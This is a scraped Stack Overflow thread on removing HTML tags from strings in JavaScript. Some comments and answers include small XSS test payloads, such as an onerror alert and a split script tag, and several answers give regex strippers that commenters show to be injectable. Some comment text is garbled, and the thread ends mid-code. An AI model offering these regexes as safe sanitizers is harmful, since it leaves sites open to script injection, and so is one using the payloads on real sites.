How to strip off HTML tags from a string using plain JavaScript only, not using a library?
46 Answers
If you're running in a browser, then the easiest way is just to let the browser do it for you...
function stripHtml(html)
{
let tmp = document.createElement("DIV");
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.
myString.replace(/<[^>]*>?/gm, '');

- 118,113
- 30
- 216
- 245

- 537,072
- 198
- 649
- 721
-
9
-
@Mike, you should do the replacement after the string has actually been finished – nickf Dec 26 '10 at 15:48
-
that is not sufficient. If two different scripts do two different writes : `document.write('
/g, '');` and `document.write('')` then the second write closes the incomplete tag from the first. Also, `.` does not match `\n`, so your regex does not work on `'
'` which is a valid complete tag. – Mike Samuel Dec 27 '10 at 03:09
-
@MikeSamuel not quite sure your fix works correctly on the problem you suggested. If the problem you proposed is that two different writes hold parts of one tag, e.g. the first "
blablabla
". Then while your regex will erase the first string completely, it will ignore the initial > bracket in the second string. Did I understand your test case correctly? – Perishable Dave Sep 22 '11 at 17:46 -
2@PerishableDave, I agree that the `>` will be left in the second. That's not an injection hazard though. The hazard occurs due to `<` left in the first, which causes the HTML parser to be in a context other than [data state](http://www.w3.org/TR/html5/tokenization.html#data-state) when the second starts. Note there is no transition from data state on `>`. – Mike Samuel Sep 22 '11 at 18:04
-
123@MikeSamuel Did we decide on this answer yet? Naive user here ready to copy-paste. – Ziggy May 07 '13 at 18:32
-
1@Ziggy, no. This answer is still not safe even if you make the close `>` optional. Consider `""`. – Mike Samuel May 08 '13 at 00:24
-
3This also, I believe, gets completely confused if given something like `` Assuming correctly written HTML, you still need to take into account that a greater than sign might be somewhere in the quoted text in an attribute. Also you would want to remove all the text inside of ` – Jonathon Aug 18 '13 at 02:37
-
19@AntonioMax, I've answered this question [ad nauseam](http://stackoverflow.com/a/430240/20394), but to the substance of your question, because **security critical code shouldn't be copied & pasted.** You should download a library, and keep it up-to-date and patched so that you're secure against recently discovered vulnerabilities and to changes in browsers. – Mike Samuel Nov 27 '13 at 16:04
-
@MikeSamuel That was awesome. We're on the same page and your comment on that link is just right, thank you. – Antonio Max Nov 27 '13 at 21:59
-
Could you continue to loop through this expression until the text no longer contains any `<>`, assuming that the text you're trying to find doesn't have any either? – Vasu Jan 28 '14 at 23:39
-
1The solution shown above does not replace " ". The "jQuery(html).text();" does that job. – Benny Code Feb 24 '14 at 17:38
-
This answer is far better than others as I think anyone shall be able use and add other characters that they want or might want to remove. If any data is coming from database with escape characters like <, >, etc. The regular expression is the only way that is properly applicable in all the cases. – Abhishek Dhanraj Shahdeo Nov 08 '16 at 10:47
-
1
-
`m` in `/<(?:.|\n)*?>/gm` is not needed because you don't use `^` and `$` inside the regex. See [*"The multiline mode is enabled by the flag /.../m. It only affects the behavior of ^ and $."*](https://javascript.info/regexp-multiline-mode). I've tested and it works without `m`. – tanguy_k May 16 '19 at 12:40
-
2Would be nice to have some explanations (what cases it handles, limitations, explanations about the regex itself...) and unit tests – tanguy_k May 16 '19 at 13:02
-
a simple character replace: `myString.replace(/[<]/g, '<').replace(/[>]/g, '>');` – SwiftNinjaPro Dec 15 '19 at 01:46
-
-
1how come no one pointed to https://stackoverflow.com/a/1732454/501765 yet? – törzsmókus Jan 22 '21 at 10:52
-
@MikeSamuel I do not think the `?` you added in `/<[^>]*>?/gm` is needed or even correct. Wouldn't it replace any `<` in the text? – Agostino Feb 18 '21 at 11:27
-
@Agostino. It's necessary if you want to remove the tag from `Foo
' in text that follows. – Mike Samuel Feb 19 '21 at 05:56 -
@MikeSamuel Will it also strip any literal `<` in the text, e.g. `3<4`? If so, I would at least add a note about this in the answer. – Agostino Feb 22 '21 at 10:25
-
You might want to decode html-entities in text after removing tags (e.g. &, ). This library can help you https://www.npmjs.com/package/html-entities – Vincente Dec 15 '21 at 17:02
-
I would like to share an edited version of the Shog9's approved answer.
As Mike Samuel pointed with a comment, that function can execute inline javascript code.
But Shog9 is right when saying "let the browser do it for you..."
so.. here my edited version, using DOMParser:
function strip(html){
let doc = new DOMParser().parseFromString(html, 'text/html');
return doc.body.textContent || "";
}
here the code to test the inline javascript:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Also, it does not request resources on parse (like images)
strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")
-
10
-
1This is not strip tags, but more like PHP htmlspecialchars(). Still useful for me. – Daantje Sep 14 '18 at 19:38
-
1Note that this also removes whitespace from the beginning of the text. – Raine Revere Apr 11 '19 at 15:48
-
-
2also, it does not try to [parse html using regex](https://stackoverflow.com/a/1732454/501765) – törzsmókus Jan 22 '21 at 10:53
-
6This should be the accepted answer because it's the safest and fastest way to do – the_previ Oct 06 '21 at 12:00
-
What does the or in the return does? Looks like this function will return a boolean. – Ronen Festinger Dec 06 '22 at 20:02
-
It won't return a boolean; it will return `doc.body.textContent` if it is truthy, or `""` otherwise, i.e. the first item that is true when turned into a boolean. – Ian Kim Feb 24 '23 at 15:19
-
This doesn't seem to strip HTML tags recursively. How can I recursively parse HTML into text? Thanks. – Teddy C Mar 13 '23 at 04:31
-
We have used this, but found that it doesn't work with sth like `\">`. Calling strip() recursively in case some tags still exists fixes that https://stackoverflow.com/a/76424919/15266227 – Samuel Eiche Jun 07 '23 at 15:34
Simplest way:
jQuery(html).text();
That retrieves all the text from a string of html.
-
114We always use jQuery for projects since invariably our projects have a lot of Javascript. Therefore we didn't add bulk, we took advantage of existing API code... – Mark Mar 14 '12 at 16:31
-
40You use it, but the OP might not. the question was about Javascript NOT JQuery. – Rafael Herscovici Mar 14 '12 at 16:55
-
2If you are using CKEditor, you already have jQuery loading. But to get all of the actual characters for an accurate count, you need to trim the result: chars = jQuery(editor.getData()).text().trim()) – Benxamin Nov 02 '12 at 14:30
-
119It's still a useful answer for people who need to do the same thing as the OP (like me) and don't mind using jQuery (like me), not to mention, it could have been useful to the OP if they were considering using jQuery. The point of the site is to share knowledge. Keep in mind that the chilling effect you might have by chastising useful answers without good reason. – acjay Nov 29 '12 at 01:32
-
31@Dementic shockingly, I find the threads with multiple answers to be the most useful, because often a secondary answer meets my exact needs, while the primary answer meets the general case. – Eric G Dec 14 '12 at 19:11
-
38That will not work if you some part of string is not wrapped in html tag. e.g. "Error: Please enter a valid email" will return only "Error:" – Aamir Afridi Feb 05 '13 at 11:10
-
18The comment by Mike Samuel above applies here as well. Don't use this with HTML from an untrusted source. To see why, try running `jQuery("
").text();` – Janne Aukia Feb 12 '13 at 08:38
-
2@dementic: in the tags there is also jQuery, so I do not see why this would not be a valid answer.. +1 helped me – Igor L. Feb 26 '13 at 10:48
-
1@IgorLacik - if you check the edits, when i wrote the comment Jquery was not in the tags, it was added because of the jquery answers. – Rafael Herscovici Feb 26 '13 at 11:22
-
16You should wrap it in a HTML element to make it valid for text strings as well: `$('').html(html).text()`. This will also work backend in node.js. – David Hellsing Apr 22 '13 at 08:39
-
@JanneAukia I was curious so I made a fiddle. http://jsfiddle.net/gPdZm/1/ I would expect the alert to be run twice: once when the page loads, and then once more when we evaluate the untrusted JS. Is that not right? Or does the alert only fire the first time it is evaluated by anything? – Ziggy May 07 '13 at 19:31
-
1This is not effective performance wise since it will create a dom element first which would trigger the loading of images if any. Stripping the html text suggested by @nickf is a better idea. – agaase Aug 20 '13 at 12:46
-
1This will not turn `
` into '"\r\n"', so a multiline text may be broken if you run just that code. For single line text it should be ok, though. – Geeky Guy Oct 29 '13 at 13:01 -
I tried this with
and the javascript still executes even though the image tags are stripped. – Nile May 04 '14 at 00:42
-
3works with angular as well: `angular.element(html).text();` (the actual call is delegated to jquery lite) – Vitalii Fedorenko May 06 '15 at 19:59
-
3This will not work if 'html' has plain string. e.g `jQuery("abc").text()` will output "abc". However `jQuery("abc").text()` will output "" (expected abc) – Raja Ehtesham Jun 23 '16 at 00:47
-
1
-
-
in case it's dynamic, $('some string').text() gives "" (empty string) – Prashant Nov 16 '17 at 11:36
-
The question asks about javascript. Jquery is not javascript, jquery is a javascript library. – ajimix Jan 14 '19 at 14:05
-
This answer was written over 10 years ago when jQuery was likely in wider use. I updated the question to more accurately reflect the original intent. That will make this answer obsolete and should be deleted. However it is historically useful and should be left as a comment. – JGallardo Jun 06 '23 at 23:55
As an extension to the jQuery method, if your string might not contain HTML (eg if you are trying to remove HTML from a form field)
jQuery(html).text();
will return an empty string if there is no HTML
Use:
jQuery('<p>' + html + '</p>').text();
instead.
Update:
As has been pointed out in the comments, in some circumstances this solution will execute javascript contained within html
if the value of html
could be influenced by an attacker, use a different solution.

- 18,150
- 39
- 158
- 271

- 1,013
- 10
- 15
Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact
The above function posted by hypoxide works fine, but I was after something that would basically convert HTML created in a Web RichText editor (for example FCKEditor) and clear out all HTML but leave all the Links due the fact that I wanted both the HTML and the plain text version to aid creating the correct parts to an STMP email (both HTML and plain text).
After a long time of searching Google myself and my collegues came up with this using the regex engine in Javascript:
str='this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
';
str=str.replace(/<br>/gi, "\n");
str=str.replace(/<p.*>/gi, "\n");
str=str.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<(?:.|\s)*?>/g, "");
the str
variable starts out like this:
this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
and then after the code has run it looks like this:-
this string has html code i want to remove
Link Number 1 -> BBC (Link->http://www.bbc.co.uk) Link Number 1
Now back to normal text and stuff
As you can see the all the HTML has been removed and the Link have been persevered with the hyperlinked text is still intact. Also I have replaced the <p>
and <br>
tags with \n
(newline char) so that some sort of visual formatting has been retained.
To change the link format (eg. BBC (Link->http://www.bbc.co.uk)
) just edit the $2 (Link->$1)
, where $1
is the href URL/URI and the $2
is the hyperlinked text. With the links directly in body of the plain text most SMTP Mail Clients convert these so the user has the ability to click on them.
Hope you find this useful.

- 3,081
- 2
- 18
- 20

- 524
- 4
- 6
An improvement to the accepted answer.
function strip(html)
{
var tmp = document.implementation.createHTMLDocument("New").body;
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
This way something running like this will do no harm:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Firefox, Chromium and Explorer 9+ are safe. Opera Presto is still vulnerable. Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.

- 1,613
- 1
- 21
- 30
-
-
1That doesn't run any scripts here in Chromium/Opera/Firefox on Linux, so why isn't it safe? – Janghou Apr 22 '16 at 10:37
-
My apologies, I must have miss-tested, I probably forgot to click run again on the jsFiddle. – Arth Apr 22 '16 at 10:59
-
-
According to the [specs](https://developer.mozilla.org/en-US/docs/Web/API/DOMImplementation/createHTMLDocument) it's optional nowadays, but it wasn't always. – Janghou Dec 15 '16 at 12:38
-
This should do the work on any Javascript environment (NodeJS included).
const text = `
<html lang="en">
<head>
<style type="text/css">*{color:red}</style>
<script>alert('hello')</script>
</head>
<body><b>This is some text</b><br/><body>
</html>`;
// Remove style tags and content
text.replace(/<style[^>]*>.*<\/style>/g, '')
// Remove script tags and content
.replace(/<script[^>]*>.*<\/script>/g, '')
// Remove all opening, closing and orphan HTML tags
.replace(/<[^>]+>/g, '')
// Remove leading spaces and repeated CR/LF
.replace(/([\r\n]+ +)+/g, '');

- 2,294
- 1
- 26
- 33
-
-
3
-
@pstanton I have fixed the code and added comments, sorry for the late response. – Karl.S Nov 01 '19 at 17:50
-
please consider reading these caveats: https://stackoverflow.com/a/1732454/501765 – törzsmókus Jan 22 '21 at 10:54
-
1Since there are no start of string or end of string anchors, the `m` pattern modifier is pointless. Since the first two patterns have common starts and finished, perhaps consolidate them by capturing the tagname and then using a backreference for the ending tag. – mickmackusa Apr 03 '23 at 01:20
-
@mickmackusa indeed, apart of that using a XML parser is the best way to strip out the tags you want as törzsmókus commented above. – Karl.S Jul 06 '23 at 23:20
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
This is a regex version, which is more resilient to malformed HTML, like:
Unclosed tags
Some text <img
"<", ">" inside tag attributes
Some text <img alt="x > y">
Newlines
Some <a
href="http://google.com">
The code
var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

- 6,614
- 2
- 32
- 30
-
How could you flip this to do literally the opposite? I want to use `string.replace()` on ONLY the text part, and leave any HTML tags and their attributes unchanged. – Ade Sep 06 '21 at 15:20
-
2My personal favourite, I would also add to remove newlines like: `const deTagged = myString.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, ''); const deNewlined = deTagged.replace(/\n/g, '');` – Leigh Mathieson Jan 19 '22 at 15:07
I altered Jibberboy2000's answer to include several <BR />
tag formats, remove everything inside <SCRIPT>
and <STYLE>
tags, format the resulting HTML by removing multiple line breaks and spaces and convert some HTML-encoded code into normal. After some testing it appears that you can convert most of full web pages into simple text where page title and content are retained.
In the simple example,
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--comment-->
<head>
<title>This is my title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {margin-top: 15px;}
a { color: #D80C1F; font-weight:bold; text-decoration:none; }
</style>
</head>
<body>
<center>
This string has <i>html</i> code i want to <b>remove</b><br>
In this line <a href="http://www.bbc.co.uk">BBC</a> with link is mentioned.<br/>Now back to "normal text" and stuff using <html encoding>
</center>
</body>
</html>
becomes
This is my title
This string has html code i want to remove
In this line BBC (http://www.bbc.co.uk) with link is mentioned.
Now back to "normal text" and stuff using
The JavaScript function and test page look this:
function convertHtmlToText() {
var inputText = document.getElementById("input").value;
var returnText = "" + inputText;
//-- remove BR tags and replace them with line break
returnText=returnText.replace(/<br>/gi, "\n");
returnText=returnText.replace(/<br\s\/>/gi, "\n");
returnText=returnText.replace(/<br\/>/gi, "\n");
//-- remove P and A tags but preserve what's inside of them
returnText=returnText.replace(/<p.*>/gi, "\n");
returnText=returnText.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 ($1)");
//-- remove all inside SCRIPT and STYLE tags
returnText=returnText.replace(/<script.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/script>/gi, "");
returnText=returnText.replace(/<style.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/style>/gi, "");
//-- remove all else
returnText=returnText.replace(/<(?:.|\s)*?>/g, "");
//-- get rid of more than 2 multiple line breaks:
returnText=returnText.replace(/(?:(?:\r\n|\r|\n)\s*){2,}/gim, "\n\n");
//-- get rid of more than 2 spaces:
returnText = returnText.replace(/ +(?= )/g,'');
//-- get rid of html-encoded characters:
returnText=returnText.replace(/ /gi," ");
returnText=returnText.replace(/&/gi,"&");
returnText=returnText.replace(/"/gi,'"');
returnText=returnText.replace(/</gi,'<');
returnText=returnText.replace(/>/gi,'>');
//-- return
document.getElementById("output").value = returnText;
}
It was used with this HTML:
<textarea id="input" style="width: 400px; height: 300px;"></textarea><br />
<button onclick="convertHtmlToText()">CONVERT</button><br />
<textarea id="output" style="width: 400px; height: 300px;"></textarea><br />

- 1
- 1

- 979
- 12
- 14
-
1I like this solution because it has treatment of html special characters... but still not nearly enough of them... the best answer for me would deal with all of them. (which is probably what jquery does). – Daniel Gerson Oct 17 '12 at 13:17
-
2
-
Note that to remove all `
` tags you could use a good regular expression instead: `/
/` that way you have just one replace instead of 3. Also it seems to me that except for the decoding of entities you can have a single regex, something like this: `/<[a-z].*?\/?>/`. – Alexis Wilke Jan 14 '16 at 07:11 -
Nice script. But what about table content? Any idea how can it be displayed – Hristo Enev Aug 16 '17 at 12:14
-
@DanielGerson, encoding html gets real hairy, real quick, but the [best approach seems to be using the he library](https://stackoverflow.com/a/57702435/1366033) – KyleMit Aug 29 '19 at 03:04
-
this fuction has a lot if itinerations which might lead to a memory leak in multiple instances of long texts. – Matías Fork Jul 02 '20 at 17:15
from CSS tricks:
https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
const originalString = `
<div>
<p>Hey that's <span>somthing</span></p>
</div>
`;
const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");
console.log(strippedString);

- 3,720
- 2
- 20
- 40
Another, admittedly less elegant solution than nickf's or Shog9's, would be to recursively walk the DOM starting at the <body> tag and append each text node.
var bodyContent = document.getElementsByTagName('body')[0];
var result = appendTextNodes(bodyContent);
function appendTextNodes(element) {
var text = '';
// Loop through the childNodes of the passed in element
for (var i = 0, len = element.childNodes.length; i < len; i++) {
// Get a reference to the current child
var node = element.childNodes[i];
// Append the node's value if it's a text node
if (node.nodeType == 3) {
text += node.nodeValue;
}
// Recurse through the node's children, if there are any
if (node.childNodes.length > 0) {
appendTextNodes(node);
}
}
// Return the final result
return text;
}

- 2,870
- 24
- 39
- 44
-
3yikes. if you're going to create a DOM tree out of your string, then just use shog's way! – nickf May 04 '09 at 23:21
-
Yes, my solution wields a sledge-hammer where a regular hammer is more appropriate :-). And I agree that yours and Shog9's solutions are better, and basically said as much in the answer. I also failed to reflect in my response that the html is already contained in a string, rendering my answer essentially useless as regards the original question anyway. :-( – Bryan May 05 '09 at 00:08
-
1To be fair, this has value - if you absolutely must preserve /all/ of the text, then this has at least a decent shot at capturing newlines, tabs, carriage returns, etc... Then again, nickf's solution should do the same, and do much faster... eh. – Shog9 May 05 '09 at 04:58
If you want to keep the links and the structure of the content (h1, h2, etc) then you should check out TextVersionJS You can use it with any HTML, although it was created to convert an HTML email to plain text.
The usage is very simple. For example in node.js:
var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
Or in the browser with pure js:
<script src="textversion.js"></script>
<script>
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
</script>
It also works with require.js:
define(["textversionjs"], function(createTextVersion) {
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
});

- 847
- 10
- 9
const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

- 371
- 5
- 13
-
doesn't work in next js as it is server side rendered but nice solution for traditional applications. use this instead - const strippedString = originalString.replace(/(<([^>]+)>)/gi, ""); – Pawan Deore Jan 06 '23 at 12:51
It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:
var htmlparser = require('htmlparser2');
var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';
var result = [];
var parser = new htmlparser.Parser({
ontext: function(text){
result.push(text);
}
}, {decodeEntities: true});
parser.write(body);
parser.end();
result.join('');
The output will be This is a simple example.
See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html
This works in both node and the browser if you pack your web application using a tool like webpack.

- 42,912
- 19
- 126
- 165
For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

- 839
- 10
- 18
-
Which characters in your pattern are made case-insensitive by that `i` pattern modifier? I see no need for capturing parentheses -- anywhere in the pattern. Bad copy-pasta? Maybe someone should whisper to Chris Coyier. – mickmackusa Apr 03 '23 at 01:24
A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.
function removeTags(string, array){
return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
function f(array, value){
return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
}
}
var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

- 1,373
- 1
- 15
- 18
After trying all of the answers mentioned most if not all of them had edge cases and couldn't completely support my needs.
I started exploring how php does it and came across the php.js lib which replicates the strip_tags method here: http://phpjs.org/functions/strip_tags/

- 2,866
- 26
- 21
-
This is a neat function and well documented. However, it can be made faster when `allowed == ''` which I think is what the OP asked for, which is nearly what Byron answered below (Byron only got the `[^>]` wrong.) – Alexis Wilke Jan 14 '16 at 08:08
-
1If you use the `allowed` param you are vulnerable to XSS: `stripTags('
mytext
', '')` returns `
mytext
` – Chris Cinelli Feb 20 '16 at 01:26
function stripHTML(my_string){
var charArr = my_string.split(''),
resultArr = [],
htmlZone = 0,
quoteZone = 0;
for( x=0; x < charArr.length; x++ ){
switch( charArr[x] + htmlZone + quoteZone ){
case "<00" : htmlZone = 1;break;
case ">10" : htmlZone = 0;resultArr.push(' ');break;
case '"10' : quoteZone = 1;break;
case "'10" : quoteZone = 2;break;
case '"11' :
case "'12" : quoteZone = 0;break;
default : if(!htmlZone){ resultArr.push(charArr[x]); }
}
}
return resultArr.join('');
}
Accounts for > inside attributes and <img onerror="javascript">
in newly created dom elements.
usage:
clean_string = stripHTML("string with <html> in it")
demo:
https://jsfiddle.net/gaby_de_wilde/pqayphzd/
demo of top answer doing the terrible things:
-
You'll need to handle escaped quotes inside an attribute value too (e.g. `string with this text should be removed, but is not">example`). – Logan Pickup Oct 25 '17 at 22:00
I made some modifications to original Jibberboy2000 script Hope it'll be usefull for someone
str = '**ANY HTML CONTENT HERE**';
str=str.replace(/<\s*br\/*>/gi, "\n");
str=str.replace(/<\s*a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<\s*\/*.+?>/ig, "\n");
str=str.replace(/ {2,}/gi, " ");
str=str.replace(/\n+\s*/gi, "\n\n");

- 49
- 1
Here's a version which sorta addresses @MikeSamuel's security concern:
function strip(html)
{
try {
var doc = document.implementation.createDocument('http://www.w3.org/1999/xhtml', 'html', null);
doc.documentElement.innerHTML = html;
return doc.documentElement.textContent||doc.documentElement.innerText;
} catch(e) {
return "";
}
}
Note, it will return an empty string if the HTML markup isn't valid XML (aka, tags must be closed and attributes must be quoted). This isn't ideal, but does avoid the issue of having the security exploit potential.
If not having valid XML markup is a requirement for you, you could try using:
var doc = document.implementation.createHTMLDocument("");
but that isn't a perfect solution either for other reasons.

- 348
- 1
- 6
-
That will fail in many circumstances if the text comes from user input (textarea or contenteditable widget...) – Alexis Wilke Jan 14 '16 at 07:12
I just needed to strip out the <a>
tags and replace them with the text of the link.
This seems to work great.
htmlContent= htmlContent.replace(/<a.*href="(.*?)">/g, '');
htmlContent= htmlContent.replace(/<\/a>/g, '');

- 109
- 2
- 6
-
This only applies for a tags and needs tweaking for being a wide function. – m3nda Jan 06 '16 at 11:03
-
Yeah, plus an anchor tag could have many other attributes such as the `title="..."`. – Alexis Wilke Jan 14 '16 at 07:58
Below code allows you to retain some html tags while stripping all others
function strip_tags(input, allowed) {
allowed = (((allowed || '') + '')
.toLowerCase()
.match(/<[a-z][a-z0-9]*>/g) || [])
.join(''); // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)
var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;
return input.replace(commentsAndPhpTags, '')
.replace(tags, function($0, $1) {
return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
});
}

- 36,687
- 39
- 170
- 242
-
1You should quote the source (`phpjs`). If you use the `allowed` param you are vulnerable to XSS: `stripTags('
mytext
', '')` returns `
mytext
` – Chris Cinelli Feb 20 '16 at 01:25
The accepted answer works fine mostly, however in IE if the html
string is null
you get the "null"
(instead of ''). Fixed:
function strip(html)
{
if (html == null) return "";
var tmp = document.createElement("DIV");
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}

- 261,912
- 58
- 460
- 511
I think the easiest way is to just use Regular Expressions as someone mentioned above. Although there's no reason to use a bunch of them. Try:
stringWithHTML = stringWithHTML.replace(/<\/?[a-z][a-z0-9]*[^<>]*>/ig, "");

- 107
- 2
- 6
-
14Don't do this if you care about security. If the user input is this: '
ipt>alert(42); ipt>' then the stripped version will be this: ''. So this is an XSS vulnerability. – molnarg Mar 06 '13 at 12:38 -
You should change the `[^<>]` with `[^>]` because a valid tag cannot include a `<` character, then the XSS vulnerability disappears. – Alexis Wilke Jan 14 '16 at 08:00
A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.
function stripHtml(unsafe) {
return $($.parseHTML(unsafe)).text();
}
Can safely strip html from:
<img src="unknown.gif" onerror="console.log('running injections');">
And other exploits.
nJoy!
const strip=(text) =>{
return (new DOMParser()?.parseFromString(text,"text/html"))
?.body?.textContent
}
const value=document.getElementById("idOfEl").value
const cleanText=strip(value)

- 1,045
- 1
- 8
- 22

- 35,338
- 10
- 157
- 202
A very good library would be sanitize-html
which is a pure JavaScript function and it could help in any environment.
My case was on React Native I needed to remove all HTML tags from the given texts. so I created this wrapper function:
import sanitizer from 'sanitize-html';
const textSanitizer = (textWithHTML: string): string =>
sanitizer(textWithHTML, {
allowedTags: [],
});
export default textSanitizer;
Now by using my textSanitizer
, I can have got the pure text contents.

- 29,059
- 15
- 130
- 154
I have created a working regular expression myself:
str=str.replace(/(<\?[a-z]*(\s[^>]*)?\?(>|$)|<!\[[a-z]*\[|\]\]>|<!DOCTYPE[^>]*?(>|$)|<!--[\s\S]*?(-->|$)|<[a-z?!\/]([a-z0-9_:.])*(\s[^>]*)?(>|$))/gi, '');

- 143
- 1
- 4
simple 2 line jquery to strip the html.
var content = "<p>checking the html source </p><p>
</p><p>with </p><p>all</p><p>the html </p><p>content</p>";
var text = $(content).text();//It gets you the plain text
console.log(text);//check the data in your console
cj("#text_area_id").val(text);//set your content to text area using text_area_id

- 3,857
- 4
- 37
- 47
Using Jquery:
function stripTags() {
return $('<p></p>').html(textToEscape).text()
}

- 4,167
- 24
- 35
input
element support only one line text:
The text state represents a one line plain text edit control for the element's value.
function stripHtml(str) {
var tmp = document.createElement('input');
tmp.value = str;
return tmp.value;
}
Update: this works as expected
function stripHtml(str) {
// Remove some tags
str = str.replace(/<[^>]+>/gim, '');
// Remove BB code
str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');
// Remove html and line breaks
const div = document.createElement('div');
div.innerHTML = str;
const input = document.createElement('input');
input.value = div.textContent || div.innerText || '';
return input.value;
}

- 170
- 11
-
Doesn't work, please always mention the browser you are using when posting an answer. This is inaccurate and won't work in Chrome 61. Tags are just rendered as a string. – vdegenne Oct 02 '17 at 13:26
const getTextFromHtml = (t) =>
t
?.split('>')
?.map((i) => i.split('<')[0])
.filter((i) => !i.includes('=') && i.trim())
.join('');
const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'
getTextFromHtml(test)
// 'This onetime,I went toband camp…I edited this as a reviewer just to double check'

- 740
- 5
- 15
As others suggested, I recommend using DOMParser
when possible.
However, if you happen to be working inside a Node/JS Lambda or otherwise DOMParser
is not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match $gt;
and $lt;
as some others may have a concern about, but should capture pretty much any other scenario.
const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');
This might be easy to simplify, but it should work for most situations. Hope it helps someone.

- 905
- 9
- 19
-
`'Test'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')` – Kody Apr 05 '22 at 22:09
-
`'
Test'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')` – Kody Apr 05 '22 at 22:09
For escape characters also this will work using pattern matching:
myString.replace(/((<)|(<)(?:.|\n)*?(>)|(>))/gm, '');

- 1,356
- 2
- 14
- 35
https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML
var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
document.body.removeChild(div[i]);
}

- 1,370
- 2
- 14
- 17
method 1:
function cleanHTML(str){
str.replace(/<(?<=<)(.*?)(?=>)>/g, '<$1>');
}
function uncleanHTML(str){
str.replace(/<(?<=<)(.*?)(?=>)>/g, '<$1>');
}
method 2:
function cleanHTML(str){
str.replace(/</g, '<').replace(/>/g, '>');
}
function uncleanHTML(str){
str.replace(/</g, '<').replace(/>/g, '>');
}
also, don't forget if the user happens to post a math comment (ex: 1 < 2)
, you don't want to strip the whole comment. The browser (only tested chrome) doesn't run unicode as html tags. if you replace all <
with <
everyware in the string, the unicode will display <
as text without running any html. I recommend method 2. jquery also works well $('#element').text();

- 787
- 8
- 17
var STR='<Your HTML STRING>''
var HTMLParsedText="";
var resultSet = STR.split('>')
var resultSetLength =resultSet.length
var counter=0
while(resultSetLength>0)
{
if(resultSet[counter].indexOf('<')>0)
{
var value = resultSet[counter];
value=value.substring(0, resultSet[counter].indexOf('<'))
